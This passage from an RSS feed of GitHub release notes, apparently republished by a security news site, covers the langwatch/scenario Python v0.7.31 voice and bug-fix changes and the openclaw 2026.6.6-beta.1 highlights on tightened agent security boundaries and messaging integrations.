<li><strong>examples/voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4477464463" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/486" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/486/hovercard" href="https://github.com/langwatch/scenario/issues/486">#486</a>:</strong> retire legacy gpt-4o-audio-preview surface, migrate supported audio examples to gpt-audio-mini (<a href="https://github.com/langwatch/scenario/issues/612" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/612/hovercard">#612</a>) (<a href="https://github.com/langwatch/scenario/commit/1ebdd1ce2782c95cf2b41fcc16b405804b1f5a10">1ebdd1c</a>)</li>
</ul>
<h3>Documentation</h3>
<ul>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590127867" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/606" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/606/hovercard" href="https://github.com/langwatch/scenario/issues/606">#606</a>:</strong> document STT/TTS model choices as deliberate current-gen (<a href="https://github.com/langwatch/scenario/issues/610" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/610/hovercard">#610</a>) (<a href="https://github.com/langwatch/scenario/commit/6211df3c1386520a59de165f5a7ccd57d6a8eaf2">6211df3</a>)</li>
</ul>
<h3>Code Refactoring</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496183175" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/518" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/518/hovercard" href="https://github.com/langwatch/scenario/issues/518">#518</a>:</strong> move capability-matrix doc assertion to dedicated voice-docs suite (<a href="https://github.com/langwatch/scenario/issues/550" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/550/hovercard">#550</a>) (<a href="https://github.com/langwatch/scenario/commit/68df34c4b9fd55af890c0abae8fd439ccfaf859b">68df34c</a>), closes <a href="https://github.com/langwatch/scenario/issues/518" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/518/hovercard">#518</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[python: v0.7.31]]></title>
<description><![CDATA[0.7.31 (2026-06-11)
Features

voice/#597: voice-mode user-simulator prompt — spoken sentences, not telegraphic (#641) (3a7f660)

Bug Fixes

#221: return actual conversation in ScenarioResult.messages instead of judge context (#553) (b32125f)
#496: stop str()-coercing multimodal content in OTel tr...]]></description>
<link>https://tsecurity.de/de/3590051/it-security-tools/python-v0731/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590051/it-security-tools/python-v0731/</guid>
<pubDate>Thu, 11 Jun 2026 11:49:25 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/python/v0.7.30...python/v0.7.31">0.7.31</a> (2026-06-11)</h2>
<h3>Features</h3>
<ul>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565810844" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/597" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/597/hovercard" href="https://github.com/langwatch/scenario/issues/597">#597</a>:</strong> voice-mode user-simulator prompt — spoken sentences, not telegraphic (<a href="https://github.com/langwatch/scenario/issues/641" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/641/hovercard">#641</a>) (<a href="https://github.com/langwatch/scenario/commit/3a7f660a14eec74af3728967fba8423fc04d93b2">3a7f660</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3933639391" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/221" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/221/hovercard" href="https://github.com/langwatch/scenario/issues/221">#221</a>:</strong> return actual conversation in ScenarioResult.messages instead of judge context (<a href="https://github.com/langwatch/scenario/issues/553" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/553/hovercard">#553</a>) (<a href="https://github.com/langwatch/scenario/commit/b32125ffdd054e1f674a1dd2a656bdb4487b82c2">b32125f</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487480460" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/496" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/496/hovercard" href="https://github.com/langwatch/scenario/issues/496">#496</a>:</strong> stop str()-coercing multimodal content in OTel trace + red-team refusal detection (<a href="https://github.com/langwatch/scenario/issues/546" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/546/hovercard">#546</a>) (<a href="https://github.com/langwatch/scenario/commit/83842e1eb38c76cfff74e403780b1ea473bd0d68">83842e1</a>)</li>
<li><strong>deps:</strong> close 16 npm security alerts in scenario examples (<a href="https://github.com/langwatch/scenario/issues/637" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/637/hovercard">#637</a>) (<a href="https://github.com/langwatch/scenario/commit/ced16fee797723c49c4a67036065c7ddafc47eed">ced16fe</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486916241" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/493" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/493/hovercard" href="https://github.com/langwatch/scenario/issues/493">#493</a>:</strong> keepalive-aware recv_audio — tolerate silent-but-pinging stretches (<a href="https://github.com/langwatch/scenario/issues/649" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/649/hovercard">#649</a>) (<a href="https://github.com/langwatch/scenario/commit/1e6e1f376f413d6d9b319d5e0414d499c48c5176">1e6e1f3</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487734199" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/498" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/498/hovercard" href="https://github.com/langwatch/scenario/issues/498">#498</a>:</strong> surface attributable first-chunk timeout (phase + timeout + cause) (<a href="https://github.com/langwatch/scenario/issues/652" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/652/hovercard">#652</a>) (<a href="https://github.com/langwatch/scenario/commit/02e3e3e574dcc05eec4e74b6074757524cfc9987">02e3e3e</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615757477" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/623" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/623/hovercard" href="https://github.com/langwatch/scenario/issues/623">#623</a>:</strong> reframe realtime agent audio turns so the voiced sim does not echo them (<a href="https://github.com/langwatch/scenario/issues/653" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/653/hovercard">#653</a>) (<a href="https://github.com/langwatch/scenario/commit/9302877d9b98e6e5be25e85aee854151a958b28f">9302877</a>)</li>
<li><strong>voice:</strong> surface tool-only realtime turns (no audio chunk) (<a href="https://github.com/langwatch/scenario/issues/647" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/647/hovercard">#647</a>) (<a href="https://github.com/langwatch/scenario/commit/6041447b1740646c6543e951096f00031dd825dc">6041447</a>)</li>
</ul>
<h3>Miscellaneous</h3>
<ul>
<li><strong>examples/voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4477464463" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/486" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/486/hovercard" href="https://github.com/langwatch/scenario/issues/486">#486</a>:</strong> retire legacy gpt-4o-audio-preview surface, migrate supported audio examples to gpt-audio-mini (<a href="https://github.com/langwatch/scenario/issues/612" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/612/hovercard">#612</a>) (<a href="https://github.com/langwatch/scenario/commit/1ebdd1ce2782c95cf2b41fcc16b405804b1f5a10">1ebdd1c</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.6.6-beta.1]]></title>
<description><![CDATA[2026.6.6
Highlights

Security boundaries are substantially tighter across transcripts, sandbox binds, host environment inheritance, MCP stdio, Codex HTTP access, native search policy, elevated sender checks, deleted-agent ACP bypasses, loopback tools, Discord moderation, and Teams group actions; ...]]></description>
<link>https://tsecurity.de/de/3588572/downloads/openclaw-202666-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588572/downloads/openclaw-202666-beta1/</guid>
<pubDate>Wed, 10 Jun 2026 19:47:10 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.6.6</h2>
<h3>Highlights</h3>
<ul>
<li>Security boundaries are substantially tighter across transcripts, sandbox binds, host environment inheritance, MCP stdio, Codex HTTP access, native search policy, elevated sender checks, deleted-agent ACP bypasses, loopback tools, Discord moderation, and Teams group actions; exec approvals now fail closed on timeout. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617660755" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91529" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91529/hovercard" href="https://github.com/openclaw/openclaw/pull/91529">#91529</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619047229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91618" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91618/hovercard" href="https://github.com/openclaw/openclaw/pull/91618">#91618</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619033638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91615/hovercard" href="https://github.com/openclaw/openclaw/pull/91615">#91615</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619048471" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91619" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91619/hovercard" href="https://github.com/openclaw/openclaw/pull/91619">#91619</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624396563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91741/hovercard" href="https://github.com/openclaw/openclaw/pull/91741">#91741</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624606681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91745" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91745/hovercard" href="https://github.com/openclaw/openclaw/pull/91745">#91745</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624627622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91746" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91746/hovercard" href="https://github.com/openclaw/openclaw/pull/91746">#91746</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624682331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91748/hovercard" href="https://github.com/openclaw/openclaw/pull/91748">#91748</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624683089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91749" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91749/hovercard" href="https://github.com/openclaw/openclaw/pull/91749">#91749</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624686576" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91750" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91750/hovercard" href="https://github.com/openclaw/openclaw/pull/91750">#91750</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624689858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91751/hovercard" href="https://github.com/openclaw/openclaw/pull/91751">#91751</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624710623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91752" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91752/hovercard" href="https://github.com/openclaw/openclaw/pull/91752">#91752</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625339565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91763" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91763/hovercard" href="https://github.com/openclaw/openclaw/pull/91763">#91763</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582011731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89938" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89938/hovercard" href="https://github.com/openclaw/openclaw/pull/89938">#89938</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Telegram delivery is safer and more coherent: account-scoped topics route to the right agent, streamed text survives tool calls, <code>/compact</code> works on generic ingress, callback handling uses concrete APIs, draft chunking is shared, durable dispatch dedupe moved into the SDK, and unauthorized DM text stays out of cache and prompt context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4607547528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91189/hovercard" href="https://github.com/openclaw/openclaw/pull/91189">#91189</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558106512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88682" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88682/hovercard" href="https://github.com/openclaw/openclaw/pull/88682">#88682</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4574261417" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89588" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89588/hovercard" href="https://github.com/openclaw/openclaw/pull/89588">#89588</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586645610" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90212" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90212/hovercard" href="https://github.com/openclaw/openclaw/pull/90212">#90212</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4628927782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91876" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91876/hovercard" href="https://github.com/openclaw/openclaw/pull/91876">#91876</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4628912927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91874" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91874/hovercard" href="https://github.com/openclaw/openclaw/pull/91874">#91874</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4629583793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91904/hovercard" href="https://github.com/openclaw/openclaw/pull/91904">#91904</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615050729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91478" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91478/hovercard" href="https://github.com/openclaw/openclaw/pull/91478">#91478</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4630195095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91915/hovercard" href="https://github.com/openclaw/openclaw/pull/91915">#91915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codysai001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codysai001">@codysai001</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexzhu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexzhu0">@alexzhu0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/snowzlm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/snowzlm">@snowzlm</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>iMessage recovery and delivery now cover always-on inbound restart, durable echo markers, block streaming, idle approval discovery, hardened outbound transport, and actionable inbound startup diagnostics. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4610295049" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91335/hovercard" href="https://github.com/openclaw/openclaw/pull/91335">#91335</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613994164" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91449" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91449/hovercard" href="https://github.com/openclaw/openclaw/pull/91449">#91449</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561000464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88969/hovercard" href="https://github.com/openclaw/openclaw/pull/88969">#88969</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4556698502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88530/hovercard" href="https://github.com/openclaw/openclaw/pull/88530">#88530</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4626488824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91783" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91783/hovercard" href="https://github.com/openclaw/openclaw/pull/91783">#91783</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4626525986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91785" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91785/hovercard" href="https://github.com/openclaw/openclaw/pull/91785">#91785</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmissig/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmissig">@jmissig</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colmbrogan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colmbrogan">@colmbrogan</a>.</li>
<li>Browser and MCP connectivity gained existing-session CDP support, discovered WebSocket validation, default-profile <code>cdpUrl</code> handling, safer browser-output boundaries, Streamable HTTP loopback transport, corrected OAuth/SSE authorization handling, and broader schema compatibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613069577" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91422" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91422/hovercard" href="https://github.com/openclaw/openclaw/pull/91422">#91422</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580311803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/89851" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/89851/hovercard" href="https://github.com/openclaw/openclaw/pull/89851">#89851</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623754805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91736" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91736/hovercard" href="https://github.com/openclaw/openclaw/pull/91736">#91736</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624671369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91747" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91747/hovercard" href="https://github.com/openclaw/openclaw/pull/91747">#91747</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614042522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91451/hovercard" href="https://github.com/openclaw/openclaw/pull/91451">#91451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4414941157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80143" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80143/hovercard" href="https://github.com/openclaw/openclaw/pull/80143">#80143</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anagnorisis2peripeteia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anagnorisis2peripeteia">@anagnorisis2peripeteia</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lifuyue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lifuyue">@lifuyue</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LiuwqGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LiuwqGit">@LiuwqGit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Control UI startup and first-reply latency are lower through cached model metadata, removal of the startup catalog wait, lazy slash-command loading, and first-event tracing with slow-reply diagnostics. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617731191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91531" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91531/hovercard" href="https://github.com/openclaw/openclaw/pull/91531">#91531</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617908971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91538" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91538/hovercard" href="https://github.com/openclaw/openclaw/pull/91538">#91538</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618302216" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91568" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91568/hovercard" href="https://github.com/openclaw/openclaw/pull/91568">#91568</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618482026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91583" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91583/hovercard" href="https://github.com/openclaw/openclaw/pull/91583">#91583</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618680388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91598" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91598/hovercard" href="https://github.com/openclaw/openclaw/pull/91598">#91598</a>)</li>
<li>Provider support expands with OpenRouter OAuth onboarding and Claude Fable 5 adaptive thinking, while Codex sessions keep correct compaction ownership, local models skip guardian review, dynamic tool progress normalizes cleanly, and Gemma 4 reasoning replay is preserved. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4627937743" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91830/hovercard" href="https://github.com/openclaw/openclaw/pull/91830">#91830</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4629090999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91882" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91882/hovercard" href="https://github.com/openclaw/openclaw/pull/91882">#91882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618632675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91590/hovercard" href="https://github.com/openclaw/openclaw/pull/91590">#91590</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4557653607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88630" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88630/hovercard" href="https://github.com/openclaw/openclaw/pull/88630">#88630</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558819854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88768" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88768/hovercard" href="https://github.com/openclaw/openclaw/pull/88768">#88768</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4621950560" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91696" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91696/hovercard" href="https://github.com/openclaw/openclaw/pull/91696">#91696</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bdjben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bdjben">@bdjben</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Coder-Wangyankun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Coder-Wangyankun">@Coder-Wangyankun</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
